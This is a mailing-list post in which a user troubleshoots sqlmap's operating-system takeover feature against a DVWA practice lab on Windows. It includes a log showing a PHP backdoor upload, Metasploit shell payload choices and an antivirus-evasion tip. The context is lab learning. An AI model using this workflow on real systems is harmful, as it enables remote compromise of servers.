hi all,
i just wondering, when i tried to do --os-pwn on sqlmap in my "DVWA
windows machine"
i got an error
[WARNING] unable to upload the file through the web file stager to '/tmp'
i wonder is it only avaliable for linux OS ?
thanks
Indra Z
--
--from the net with zero space--
[11:51:36] [WARNING] unable to automatically parse any web server path
[11:51:36] [INFO] trying to upload the file stager on '/Program
Files/xampp/xampp/htdocs/hackable/uploads/' via LIMIT 'LINES TERMINATED BY'
method
[11:51:36] [INFO] heuristics detected web page charset 'ascii'
[11:51:36] [INFO] the file stager has been successfully uploaded on '/Program
Files/xampp/xampp/htdocs/hackable/uploads/' -
http://192.168.2.17:80/hackable/uploads/tmpuukvf.php
[11:51:36] [INFO] the backdoor has been successfully uploaded on '/Program
Files/xampp/xampp/htdocs/hackable/uploads/' -
http://192.168.2.17:80/hackable/uploads/tmpbclch.php
[11:51:36] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on
all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine
tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine
tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 5
what is the back-end DBMS address? [Enter for '192.168.2.17' (detected)]
which remote port number do you want to use? [43128] 8080
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 2
[11:51:50] [INFO] creation in progress .... done
[11:51:54] [INFO] uploading shellcodeexec to '/tmp/tmpseaddv.exe'
[11:51:54] [WARNING] unable to upload the file through the web file stager to
'/tmp'
[11:51:54] [ERROR] there has been a problem uploading shellcodeexec, it looks
like the binary file has not been written on the database underlying file
system or an AV has flagged it as malicious and removed it. In such a case it
is recommended to recompile shellcodeexec with slight modification to the
source code or pack it with an obfuscator software
[11:51:54] [ERROR] unable to mount the operating system takeover, skipping to
the next URL
[11:51:54] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 4 times
[11:51:54] [INFO] you can find results of scanning in multiple targets mode
inside the CSV file '/root/.sqlmap/output/results-04222016_1151am.csv'
------------------------------------------------------------------------------
Find and fix application performance issues faster with Applications Manager
Applications Manager provides deep performance insights into multiple tiers of
your business applications. It resolves application problems quickly and
reduces your MTTR. Get your free trial!
https://ad.doubleclick.net/ddm/clk/302982198;130105516;z
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
